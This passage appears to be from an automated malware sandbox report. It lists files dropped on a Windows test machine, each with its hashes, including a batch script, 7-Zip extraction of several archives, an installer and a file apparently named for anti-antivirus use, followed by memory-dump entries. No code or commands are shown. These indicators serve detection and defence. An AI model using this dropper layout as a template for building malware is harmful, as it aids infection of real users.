                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      acf07e6e6c18c7c3e0d1f3a444063acd

                                                                      SHA1

                                                                      83ca2e991993f8d5481cb8f864d10a6d5fab42a5

                                                                      SHA256

                                                                      14e9b05bbebe5a161c524fce5312e7ab4cc22bd664b9bd63087c138c75927492

                                                                      SHA512

                                                                      99c448d70ac5185970ec25eb00cfced17f53f8b2ad0a5bf22eee7cdfe93085b0123946f4e0bc6d6e18f4230b78361dc158c65a1c49252a72407b1f06450ebb8b

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      4cf58c14f20b0346c58a758fa11bfd2f

                                                                      SHA1

                                                                      c142f1e2dd9cecd1de45e83859b294d1bad77229

                                                                      SHA256

                                                                      832a864e7b95e32c54c933b7767246b05fe3a7bc0b65ae7858833ffcc502e67d

                                                                      SHA512

                                                                      96f572683cd4cdce1654717cb1356fda9d3bb464b657e8a7dcbd20b28e34629cb688c3ad1bf225aef832018871440a6fe49971cbfb28fe8643d8f9645feb8867

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      93eeb0756fd70dfb396f659e8cf1b537

                                                                      SHA1

                                                                      0a2a5391c99e1a3aa230c24667abb645555ba8ba

                                                                      SHA256

                                                                      4ffe7d0b85352781f07c49ce8621aa417db3d2acc246ac5854ae369879852010

                                                                      SHA512

                                                                      1fd4cd9898a58e2faeb1d96c518b703a9936cc979afafb8aae21ebb6f5be00bac12838359f0c4c49bfb1eff29e1369986731ecc9f05561b326fb219bca5b6d82

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                      Filesize

                                                                      12KB

                                                                      MD5

                                                                      20f101bc2c6bc41e8f91fe5278c4056e

                                                                      SHA1

                                                                      546b4b194448147cc711b668ed969a211b3e675e

                                                                      SHA256

                                                                      7a617d4e4a0d9560cfd9e88bbda0f745d1a6a4b97b5ad18f0bd86ecc40958e9a

                                                                      SHA512

                                                                      dc79f749d57f3c2ee13ba680564fab29fb97ee85930a38db31f19bade08efe0f881695be69be40af224c4d91418aeadeb2ec977b662e40f514c6a01e55293ec6

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index

                                                                      Filesize

                                                                      24B

                                                                      MD5

                                                                      54cb446f628b2ea4a5bce5769910512e

                                                                      SHA1

                                                                      c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

                                                                      SHA256

                                                                      fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

                                                                      SHA512

                                                                      8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      fcb898b34dccc68f1f5744ed54552286

                                                                      SHA1

                                                                      2eaf8dcd42eb4a35fa6428450878b85a6c668e1d

                                                                      SHA256

                                                                      c9cd200684c671e5ed98b8e3e6361186b55380a4fb946336c6b1517a80567063

                                                                      SHA512

                                                                      1d5e2a01c1d3c24ff5d2f8a31f9b32459fae1fd6b446d177944c98ef717599f6fc5decb770edd43cf047b4d02981bee960b8d98cdeb28eafff0976f0af1fb597

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\0e6e2b7e-16cb-4d70-87a0-ac43d78a5e69\index-dir\the-real-index~RFe5a6831.TMP

                                                                      Filesize

                                                                      48B

                                                                      MD5

                                                                      6cfdd6c65dc3042708071429f7f63d49

                                                                      SHA1

                                                                      1ba1ca71fe378f2cf0563f504dc4a6d2157e5ec1

                                                                      SHA256

                                                                      bdc17775bd53acc6e492fb9e3b8111b73ab2fb6c79715eb62c517180090471d7

                                                                      SHA512

                                                                      cde1842e43d169025f218d94e9c1a1740972e9088e942eb07f24ca1198fbf166c4b9db3bd54b935b5739ada8a078bb71dd33fbb9d6df746ba227e7e83459058f

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      119B

                                                                      MD5

                                                                      dcd05c00279183de899bf36573e96657

                                                                      SHA1

                                                                      1c4dc09532b555ac6669fef9435adfb5e6ce6f51

                                                                      SHA256

                                                                      c59399f40fb66c2de27eee722f846dadeef42e1a65a536d309818ff2153c14b6

                                                                      SHA512

                                                                      25ccb0f0da41665a69264aa1a74566f198ac037cab105f9ec6f673c31b14f3d88b2b99e1f8c46249d738dba13179f4fdbe04a5ca6a67edd24cd424045a98939f

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      112B

                                                                      MD5

                                                                      a533dbee2b1018dda1d1d70c767981c1

                                                                      SHA1

                                                                      462c11a894b013cc853daf3f158f4e3fecf5f9cf

                                                                      SHA256

                                                                      ba5a4c65fbd05f92399cecb84f2eaf6855ca4d674a25a2a40c109214b2c1aae3

                                                                      SHA512

                                                                      d3283901ba2e26cb538bccb760b905137799c01b9a38d76a259557e6acfb4c4e051a74d8b86f10d8768b3f1cf704dc6a22623b9a9fc1bc367fa26cce9b94a197

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      56B

                                                                      MD5

                                                                      ae1bccd6831ebfe5ad03b482ee266e4f

                                                                      SHA1

                                                                      01f4179f48f1af383b275d7ee338dd160b6f558a

                                                                      SHA256

                                                                      1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

                                                                      SHA512

                                                                      baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      114B

                                                                      MD5

                                                                      fc4387d666a2d5d88dd7f74c8f9d68b8

                                                                      SHA1

                                                                      06214eb04646b1904b6073e484ba222f161f37be

                                                                      SHA256

                                                                      a4d93d9aacd6b97422248a1dcdb7cf74bec3e4ba58e6397e2c17a8137085fd8b

                                                                      SHA512

                                                                      ae228fb9c460f4a435485322a57d7a54d1be8c8ddc759666368959bd9c505c6e316f035c059ef3c04d10cd32db434947bf5cf5904658c8a0393b80af7c6d83ed

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      187B

                                                                      MD5

                                                                      87aef95f72269523be9295d2b6d91147

                                                                      SHA1

                                                                      48bd563631f121b991ee40998c6bf7979b5326f0

                                                                      SHA256

                                                                      5050093b05eeafccae81c6a349499cab79989997e04f01338fb258afda5e48ac

                                                                      SHA512

                                                                      775ea3909c57003b3f7448abb1f7c186127fb429b9c863f8a9001e818ff6227fe51e1d2e941344295d0b9e8045d10477a5c03284d9726db797fa1d79306bb86d

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      178B

                                                                      MD5

                                                                      e43b5a9489450c3a906ac4e5ec6d6edd

                                                                      SHA1

                                                                      c0b6511fb9a8b6aff4f152c792a98d31fcadcb07

                                                                      SHA256

                                                                      aa61cbed1515ade8c09e95bd423ca53e6b002388641e93996f01929b38795d0c

                                                                      SHA512

                                                                      6a88c8bba007dd9ec99cbbfee1e7bf40caf7c6e9a9f597e351656054fc3b06ed0a14f4b37c9015c50bdc47448623422e34b9dc02a5cfb98433016494166e40f8

                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                      Filesize

                                                                      176B

                                                                      MD5

                                                                      149e5896f39ea962ee4e43e00cbb719d

                                                                      SHA1

                                                                      61f37f8c76443faf4818fdafd7a586d73da84e56

                                                                      SHA256

                                                                      7ce5e23f4bfe3c1c0088c614e5be6d55493a3c95bd3124fd94bce0ddfa6c4ce5

                                                                      SHA512

                                                                      b8011e37a38eb17935ded3237a87c53338752b0450315f03cd280a08b5917340933ca75ef4e7eef2f22efb8c715e538a288c9b0df5123c851f256fe8c83a239a

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a4bef.TMP
  Filesize: 120B
  MD5: 0619b3bedb6ecfbeb1af55458dea42e3
  SHA1: 68c3af847e49db57683339d1b768833f7f1e61be
  SHA256: bbe84cbe0a63d7dd529b2511a12df1a5608be82bb24e0cd02d6bb92699ee3c09
  SHA512: 9319f1394a6b87a1f427a9b781dce42d7f68c8764062eec8d6500da9ea3e201e3775a1f92796d7f75f63b01223e8a325c769be993ac5fd359d5046fb29ad12e9

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT
  Filesize: 16B
  MD5: 46295cac801e5d4857d09837238a6394
  SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
  SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
  SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir4332_930806541\Icons Monochrome\16.png
  Filesize: 216B
  MD5: a4fd4f5953721f7f3a5b4bfd58922efe
  SHA1: f3abed41d764efbd26bacf84c42bd8098a14c5cb
  SHA256: c659d57841bb33d63f7b1334200548f207340d95e8e2ae25aac7a798a08071a3
  SHA512: 7fcc1ca4d6d97335e76faa65b7cfb381fb722210041bdcd3b31b0f94e15dc226eec4639547af86ae71f311f52a956dc83294c2d23f345e63b5e45e25956b2691

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize: 287KB
  MD5: dba47117e58a4c95f60a693acfcd81d6
  SHA1: 1325a6e27ab2409ef24795c0e9bb777e8a05d044
  SHA256: 07fbb63934cc4eec4864b87029864c95298fcb35d017ac49e488585dff2b3bc5
  SHA512: e6f7b71da72f71893bf590d43325078dbcfa202b6959a46fdfd933614ac4639af0bfb12d9859a684d82a753636b6dc9a546c47a3af4ff512ec08f5f83086e749

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
  Filesize: 287KB
  MD5: 34d4b17bd203ac807b6d7cde30599ac0
  SHA1: fc497999b0a269d590317fd3aad1abd96d3a0472
  SHA256: 6b460670ad1c2c0f74c40b66aa24a0cbeebb0b0e95475758ad10911d0939369d
  SHA512: dc545ecc2d6c6110a3b0e862097201fa5f0b86c1531a4c4c69b96bbc9e0f8ba5c6f6e9947964ed84c5c9726ff1ca8d3486162e8cbe8d37c77e1fba16aece5626

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
  Filesize: 111KB
  MD5: a0a5ff2e6e9ef7d820ca42d09a660e8c
  SHA1: fcb25c451672458b937480a286cd61970b58ba55
  SHA256: 27dd5ae1e86e4ed32fdebff38ed4332a040ce765141b014255377d0315a73a85
  SHA512: 8ea88314261582ff254a5b5885f440299fc8d98be5298b421a381e5d5974667c43ecced1de5aee617d8385ae64def9919f7305d4fc6938b9ac99a3a6cbf7dc5d

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5a15ac.TMP
  Filesize: 93KB
  MD5: 9dae7a25384a7bdd810b501544b77a94
  SHA1: fc55bd5221171dc4e5853cdf3ab39fc3c7560617
  SHA256: 2db0c8d1e0fa0940af7f2e789d2baf8a0d8f12cc38ced16a9289d8ecf3587f16
  SHA512: c33f0668e98e2637065bb0363a8713781749d89cfd424599ea4f5437280e00904a8b03eb07a0ae73afecc1ef24240fd6384d68f7e14fe90931bc02d53552bbf2

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
  Filesize: 2B
  MD5: 99914b932bd37a50b983c5e7c90ae93b
  SHA1: bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
  SHA256: 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
  SHA512: 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

• C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
  Filesize: 2.5MB
  MD5: b2e6a3d0bf3320b759c464ae6fa5b735
  SHA1: cc9f5de7742b9c11f7c0c0e3f9d39b0c16b38cc1
  SHA256: 771b76ba28496c56d1d9c0fe67fdf7688a2f1b12a9eb428050551338945337a3
  SHA512: bf2f09aebf6d4b07ec06ce37617361e149b26d7fc2f5c0715a5e479747eb5b1f8fc615c90d1e4d8d751e05dd566819facfef8a00cfb7acb61ec588b0c23b022a

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ybfkvbxl.3bg.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

• C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Filesize: 458KB
  MD5: 619f7135621b50fd1900ff24aade1524
  SHA1: 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
  SHA256: 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
  SHA512: 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

• C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT
  Filesize: 2.2MB
  MD5: 6dd7f70cddc4310e047032d70550f72c
  SHA1: e93c0d3a03dbe51eba117ea8e10bd0e8b6b27562
  SHA256: e92508881b6d69c45897a58b4c7dc58ee68e438979604d7f7b6f6ff71f15444d
  SHA512: 1e6398a9739f57a3cf754a6e73f92cf67fe117440a6afe698767c578f396a4b8dab93b5568d02fa23fbcd3565b9017254625d58b1ea7a375c8537f2bab90f42c

• C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe
  Filesize: 21KB
  MD5: 4265bf9f9535ebb4e1830e2a50589285
  SHA1: ddc45fe277a3b39179dd9e39e17d71b50a184607
  SHA256: c07698b4c960b60d8a3c661887d6cc1f7fe74e31a24d4c2ae95d52d1c92ce403
  SHA512: 3a7a0a8a6b82d5e1b6c06c12250eb9b347ed024811467d6da5123f6d07a79836a4e414758cb5c708d0c96cc4a020f8743b2c1e4fa5f5ed448fc087772ab592be

• C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip
  Filesize: 9KB
  MD5: 18f4fe969c4ba0517b403e28f7ad2b72
  SHA1: 9df09751ee1246db2ed6b6ed6fec87fb0891e077
  SHA256: 06d1004f28a87b42b1d7ac23ff2e4b43d736295abc2e84740504386f40a041f4
  SHA512: 9847b8e2b849b09a76e22ab0d76a1a7d29079676dbdf4277b712709af0ac6a6f0e3a473f144f0a8e247861111357027a758b95e4d096d24cec160192c5da32a4

• C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
  Filesize: 9KB
  MD5: a915fd2a4e2750ee9003e628294bf284
  SHA1: f9adc1e65fc3d2cf39b2c5a89030f3225e21616d
  SHA256: 5e2e339dbee22d6c05d652646071bc81ad96a6422eb311453ca3905e7dfea285
  SHA512: 044d5370ec915fb488cf77c1b181f5a4f89833028266f922766b782ff445f61ab85b92980d6939d0e252a368eb846def27bcdea7f029999d6854a90c793b3a5f

• C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
  Filesize: 9KB
  MD5: 4a5f569872c858ede1c0c67500cfdd6d
  SHA1: cdcac69d89b45a7903198467c2d2d32126c31661
  SHA256: 88b2d9a82c911ad61f3570aa31b360ae1649b117f6495459698d724f0c9638dc
  SHA512: d9c6776829def517a253e9c60d0316dbc03092f850383305089dc1110b1abd19668ae47dca8188e96c6f12b66a8e5b5a783901f2115cadd5c1accf019c3bdb40

• C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
  Filesize: 9KB
  MD5: 6f7f4f7ed739e3ac5eee8d0876ff76d4
  SHA1: 9a65d52885624dc47f342b5a9875d7720540c755
  SHA256: b61a321a8a1f4ca1d8c52a1ad0464ac5882073ac8da7c5585f04ce2330b78acc
  SHA512: 35cad901c3f77c58803372a2f230701469d99fb9d8b16d82b59416a62d215614ab044dcae123473cc5d9a4a09e23f2edaac53ef82bbd5b3556b9b187cff50021

• C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
  Filesize: 9KB
  MD5: 870a5535c79edcf782551514f48d89ab
  SHA1: 333d814d65753cdc4c4e8fb587c09af6960110d1
  SHA256: 814a92267e0d8867932afd625f2f8e55b04b88b2cfc31e91b6e45e473f1b057d
  SHA512: f8743ca2f1ef2433b41adc41adf6a5836c1901bda70d5d76301cb06b471796b360544efa591c49b3a7d09eee12cef7ba20e79571f50d891d4729598210772b06

• C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
  Filesize: 1.6MB
  MD5: a62944686498212b290eae637729a151
  SHA1: 2053660850d3f578f7b31e5ced16069d6f9c4ee0
  SHA256: 0bb07f0caab7e5539e7efeca5bee359d9f6b49237e0c908981d9168680fe2b3e
  SHA512: ae6abd482552445cbf8c308948519227b0d1a82c1b3adb4800f8c9ac32c519c8d0aee8f3b4caada26d1976b63b032aad72d95e574adf205b947dada23a5b8ad3

• C:\Users\Admin\AppData\Local\Temp\main\file.bin
  Filesize: 1.6MB
  MD5: 716459a6ceac7d310d4227ea3e9ddb59
  SHA1: fa27addf18c197bf5fc054bfb5ae57de1caf3382
  SHA256: ba5270891d3eef832fe34f9d67fbbb30ceb3873552ea859139914a6a783b0aa1
  SHA512: 3857cc099edd99f1c20d4c4456ec4577478afcbdb6073852c6df10775a4e6de0316ab68c6dacb7212d27f49057312ba1aeb0c35e695d84832f3e9f8d61f7d8c1

• C:\Users\Admin\AppData\Local\Temp\main\main.bat
  Filesize: 474B
  MD5: 893874465a8d9f68f0684fd61e9f1d3c
  SHA1: 866a58255ebab05d4ee2f2ed8383a6555ac1df03
  SHA256: e0855b82ec99b14bdfa38dacf90dadb2071e0d413c6559c752e0b2c6e8cd08c0
  SHA512: 1cc878a3236a5ce4f3a89fae580b4d16a7842fd03dfe0a2c7d1d5da5be822528ea3826f659a70de727c9307fb15997f56b7204582043dc7efcc6c818f7aa2bd7

• C:\Users\Admin\Downloads\Unconfirmed 378584.crdownload
  Filesize: 1.5MB
  MD5: f1320bd826092e99fcec85cc96a29791
  SHA1: c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed
  SHA256: ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba
  SHA512: c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a

• \??\pipe\crashpad_4332_UOQZPMJYURYHESBT
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

• \Program Files\7-Zip\7-zip.dll
  Filesize: 99KB
  MD5: 8af282b10fd825dc83d827c1d8d23b53
  SHA1: 17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355
  SHA256: 1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca
  SHA512: cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8

• \Users\Admin\AppData\Local\Temp\main\7z.dll
  Filesize: 1.6MB
  MD5: 72491c7b87a7c2dd350b727444f13bb4
  SHA1: 1e9338d56db7ded386878eab7bb44b8934ab1bc7
  SHA256: 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
  SHA512: 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

• memory/868-78-0x0000000005040000-0x000000000553E000-memory.dmp
  Filesize: 5.0MB

• memory/868-81-0x0000000004CB0000-0x0000000004D16000-memory.dmp
  Filesize: 408KB

• memory/868-77-0x0000000000240000-0x000000000024C000-memory.dmp
  Filesize: 48KB

• memory/868-79-0x0000000004A90000-0x0000000004B22000-memory.dmp
  Filesize: 584KB

• memory/868-80-0x0000000004C10000-0x0000000004C1A000-memory.dmp
  Filesize: 40KB

• memory/1192-86-0x00000000073E0000-0x0000000007402000-memory.dmp
  Filesize: 136KB

• memory/1192-85-0x00000000074E0000-0x0000000007B08000-memory.dmp
  Filesize: 6.2MB

• memory/1192-108-0x00000000095B0000-0x00000000095E3000-memory.dmp
  Filesize: 204KB

• memory/1192-91-0x00000000085F0000-0x0000000008666000-memory.dmp
  Filesize: 472KB

• memory/1192-90-0x0000000008520000-0x000000000856B000-memory.dmp
  Filesize: 300KB

• memory/1192-89-0x0000000007BD0000-0x0000000007BEC000-memory.dmp
  Filesize: 112KB

• memory/1192-88-0x0000000007DD0000-0x0000000008120000-memory.dmp
  Filesize: 3.3MB

• memory/1192-87-0x0000000007CF0000-0x0000000007D56000-memory.dmp
  Filesize: 408KB

• memory/1192-317-0x0000000009670000-0x0000000009678000-memory.dmp
  Filesize: 32KB

• memory/1192-109-0x000000006F740000-0x000000006F78B000-memory.dmp
  Filesize: 300KB

• memory/1192-84-0x0000000004970000-0x00000000049A6000-memory.dmp
  Filesize: 216KB

• memory/1192-110-0x0000000009350000-0x000000000936E000-memory.dmp
  Filesize: 120KB

• memory/1192-115-0x0000000009790000-0x0000000009835000-memory.dmp
  Filesize: 660KB

• memory/1192-116-0x00000000098E0000-0x0000000009974000-memory.dmp
  Filesize: 592KB

• memory/1192-312-0x0000000009840000-0x000000000985A000-memory.dmp
  Filesize: 104KB

• memory/4180-7-0x00007FF7E0330000-0x00007FF7E0E5D000-memory.dmp
  Filesize: 11.2MB

• memory/5104-5-0x00000000012D0000-0x0000000001326000-memory.dmp
  Filesize: 344KB

• memory/5104-15-0x00000000012D0000-0x0000000001326000-memory.dmp
  Filesize: 344KB

• memory/5104-10-0x00000000012D0000-0x0000000001326000-memory.dmp
  Filesize: 344KB

• memory/5104-8-0x00000000012D0000-0x0000000001326000-memory.dmp
  Filesize: 344KB